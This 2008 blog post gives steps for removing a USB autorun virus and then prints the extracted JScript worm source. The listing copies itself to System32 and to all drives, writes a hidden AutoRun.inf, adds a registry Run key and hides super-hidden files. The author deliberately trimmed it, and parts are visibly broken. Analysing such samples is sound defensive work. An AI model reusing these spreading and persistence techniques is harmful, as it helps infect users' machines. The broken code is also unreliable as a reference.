Sunday, July 27, 2008

Clearing Virus 1001

I noticed, that lately USB drive viruses seems to be the rage now. I do have a few simple steps for you if you suspect that your precious drive has a virus.

1. Make sure that you can view hidden files and folder, including system protected ones.
2. Do not double click to open your drive. Doing so WILL invite the virus into your rig.
3. You have 2 choices, one, open the drive letter "E:,F:or G:" in the address bar.
4. Two, you could right click and choose open, but....
5. ...the Virus Mawar actually does this

Open = wscript.exe \VirusMwrdy.js
shellexecute = wscript.exe \VirusMwrdy.js
shell\Open\command = wscript.exe \VirusMwrdy.js
shell\Explore\command = wscript.exe \VirusMwrdy.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMwrdy.js
shell\Scan for Viruses\command = wscript.exe \VirusMwrdy.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMwrdy.js
shell\Scan with AVG\command = wscript.exe \VirusMwrdy.js
shell = Explore

See the open command? In reality, even choosing open triggers the virus, so I think it would be good to use step one to open your drive.

6. Once you have opened your infected drive, locate the AUTORUN.inf file.
7. Open it. See what it runs when you double click your USB drive.
8. Delete the program associated with the AUTORUN.inf file, and then delete the AUTORUN.inf.
9. Done.
10. YOu could opt to scan with any antivirus, if you desire.

Anyhow, I managed to extract the .js code from this idiot.

// DarkSerenade Music.. beautiful

var ThisFileName = "\\VirusMwrdy.js";
var Mwrdy ="\\SpaQ - The Novel.html"
var AutorunFileName = "\\AutoRun.inf";
var CRLF = "\r\n";
var RemovableDrive = 1;
var FixedDrive = 2;
var DelayStart = 1000;
var DelayProcess = 1000;
var DelayFixedDrive = 60000;
// Global Variable
var ThisText,AutorunText,tf,RegPath,MwrdyText;
AutorunText = "[autorun]" + CRLF;
AutorunText = AutorunText + "Open = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shellexecute = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shell\\Open\\command = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shell\\Explore\\command = wscript.exe " + ThisFileName + " -Clicked" + CRLF;
AutorunText = AutorunText + "shell\\AutoPlay\\command = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shell\\Scan for Viruses\\command = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shell\\Scan with Norton AntiVirus\\command = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shell\\Scan with AVG\\command = wscript.exe " + ThisFileName + CRLF;
AutorunText = AutorunText + "shell = Explore";
MwrdyText = ""
MwrdyText = MwrdyText + "Oh my... aku benci sgguh tgk cter SpaQ yg pnuh kegedikan anak2 muda tu.. hmm.. insafla.. hey.. aku pun insaf 2 wat virus ni "
var fs = new ActiveXObject("Scripting.FileSystemObject");
var ThisPath = fs.GetFile(WScript.ScriptFullname);
var check = ThisPath.Drive.DriveType;
var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder
var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder
var aShell = new ActiveXObject("WScript.Shell");
// Open the explorer if double clicked
var aArgs = WScript.Arguments;
for (var i = 0; i < aArgs.length; i++)
{ if(aArgs(i) == "-Clicked")
{aShell.Run(WinPath + "\\explorer.exe " + WScript.ScriptFullname.substr(0,3)); }}
// copy diri sendiri save kat win dir
var text;
{text = ThisPath.OpenAsTextStream(1,-2); //1 - open for read, -2 using syetem default encoding
ThisText = "";
while (!text.AtendOfStream) // copy this file to the ThisText
{ThisText = ThisText + text.ReadLine();
ThisText = ThisText + "\n";
} catch(e){}
if (fs.FileExists(SysPath + ThisFileName))
{tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 32;}
tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overite n unicode
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 39;
} catch(e){}
var DrivesEnum = new Enumerator(fs.Drives);
var aDrive;for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext()){
aDrive = DrivesEnum.item();
if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != "A:") // 1 - Removable, 2 - Fixed{
// copy diri sendiri save kat flash drive
if (fs.FileExists(aDrive.Path + ThisFileName))
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 32;}
tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true); tf.Write(ThisText);tf.Close();
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 39; catch(e){}// mwar punya ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
try{ if (fs.FileExists(aDrive.Path + Mwrdy))
{tf = fs.GetFile(aDrive.Path + Mwrdy);
tf.Attributes = 32;}tf = fs.CreateTextFile(aDrive.Path + Mwrdy, 2, true);
tf = fs.GetFile(aDrive.Path + Mwrdy);
tf.Attributes = 32;
} catch(e){}
// copy autorun.inf save kat flash drive
try{if (fs.FileExists(aDrive.Path + AutorunFileName)) {tf = fs.GetFile(aDrive.Path + AutorunFileName);tf.Attributes = 32;
} tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);
tf.Close();tf = fs.GetFile(aDrive.Path + AutorunFileName);tf.Attributes = 39;} catch(e){}}}
// set registry
RegPaths = RegPaths + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
RegPaths = RegPaths + "\\Muse_Virus";
aShell.RegWrite(RegPaths, "wscript.exe " + SysPath + ThisFileName, "REG_SZ");
RegPathss = RegPathss + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
RegPathss = RegPathss + "\\ShowSuperHidden";
aShell.RegWrite(RegPathss, 0, "REG_DWORD");
RegPath = RegPath + "\\Software\\Microsoft\\Internet Explorer\\Main";
RegPath = RegPath + "\\Window Title";
aShell.RegWrite(RegPath, "Virus Mawar Is Back, Now With Muse, and Matt Bellamy Rocks ++++++++++++++++++", "REG_SZ");
} catch(e){}
// wait 1 min for fixed drv
if (check != RemovableDrive)
} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())
if (check == RemovableDrive)
aShell.Run("wscript.exe " + SysPath + ThisFileName);

Note, I have intentionally deleted some codes from here, just in case some idiots try to resurrect the virus.

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